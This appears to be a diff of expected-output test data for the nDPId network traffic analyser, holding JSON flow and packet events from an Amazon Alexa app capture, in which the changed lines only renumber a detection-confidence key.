00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1490976055356,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976055356,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 